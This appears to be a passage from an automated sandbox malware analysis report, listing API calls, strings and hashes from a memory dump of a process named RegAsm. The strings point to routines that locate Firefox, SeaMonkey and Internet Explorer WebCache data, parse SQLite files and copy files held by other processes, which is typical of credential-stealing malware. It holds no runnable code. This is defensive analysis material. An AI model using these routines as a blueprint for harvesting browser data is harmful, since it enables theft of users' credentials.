                                                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                            • API String ID: 4039892925-2068335096
                                                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                                                            • memset.MSVCRT ref: 00404020
                                                                                                                            • memset.MSVCRT ref: 00404035
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                            • API String ID: 4039892925-3369679110
                                                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                            APIs
                                                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                            • API String ID: 3510742995-2641926074
                                                                                                                            • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                            • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                            • free.MSVCRT ref: 0041848B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFileLastfree
                                                                                                                            • String ID: |A
                                                                                                                            • API String ID: 981974120-1717621600
                                                                                                                            • Opcode ID: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                            • Opcode Fuzzy Hash: b6fac9d43bc75127802d1a393ff5c3575377eb3b1acc0c55043375108e40dc75
                                                                                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                              • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                              • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                            • memset.MSVCRT ref: 004033B7
                                                                                                                            • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                            • wcscmp.MSVCRT ref: 004033FC
                                                                                                                            • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                            • String ID: $0.@
                                                                                                                            • API String ID: 2758756878-1896041820
                                                                                                                            • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                            • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                            • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                            • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 00403C09
                                                                                                                            • memset.MSVCRT ref: 00403C1E
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                              • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                            • wcscat.MSVCRT ref: 00403C47
                                                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                            • wcscat.MSVCRT ref: 00403C70
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                            • API String ID: 1534475566-1174173950
                                                                                                                            • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                            • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                            • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                            • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 669240632-0
                                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                            APIs
                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                                                            • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                            Strings
                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                            • API String ID: 2925649097-2036018995
                                                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                            APIs
                                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                            • String ID: "%s"
                                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                                            • memset.MSVCRT ref: 00408888
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2911713577-0
                                                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID: @ $SQLite format 3
                                                                                                                            • API String ID: 1475443563-3708268960
                                                                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcsicmpqsort
                                                                                                                            • String ID: /nosort$/sort
                                                                                                                            • API String ID: 1579243037-1578091866
                                                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                            • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HandleModuleProcessTimes
                                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                                            • API String ID: 116129598-3385500049
                                                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                            APIs
                                                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            Strings
                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                            • API String ID: 2887208581-2114579845
                                                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                            APIs
                                                                                                                            • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                            • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                            • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                            • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 613200358-0
                                                                                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                            • API String ID: 2221118986-1725073988
                                                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID: $$8
                                                                                                                            • API String ID: 1475443563-435121686
                                                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                            • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                            Memory Dump Source
